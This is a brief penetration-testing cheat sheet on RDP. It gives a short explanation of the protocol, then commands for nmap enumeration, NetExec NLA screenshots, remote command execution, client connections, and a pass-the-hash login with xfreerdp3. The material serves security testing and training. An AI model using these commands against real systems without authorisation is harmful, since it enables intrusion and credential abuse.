NetExec RDP

NetExec RDP

• Remote Desktop Protocol (RDP) is a proprietary network protocol developed by Microsoft that enables users to connect to and control another computer or device over a network connection.
• It provides a graphical interface for remote access, allowing users to interact with the remote system as if they were physically present
• RDP allows connections to the service only to hosts with Network level authentication (NLA).
• RDP operates on a client-server model, where the client (local device) connects to the host (remote computer) via port 3389 by default, establishing a secure, encrypted communication channel

Nmap Enum

nmap -sV -sC  $ip  -p3389 --script rdp* -Pn

NetExec Enum

Nla Attack

nxc  rdp  $ip  --nla-screenshot 

Normal Screenshot (Need Auth)

nxc  rdp  $ip  -u '$user' -p '$pass' --screenshot 

Command Execution

nxc rdp $ip -u '$user' -p '$pass'  -x whoami

Connect

Remmina

remmina (A Graphical RDP Tool)

rdesktop

rdesktop -u $user -d $Domain -p '$pass'  $ip:3389

xfreerdp3

xfreerdp3 /u:$user /p:'$password' /v:$ip

Pass-The-Hash

xfreerdp3 /v:$IP /u:$USER /pth:$HASH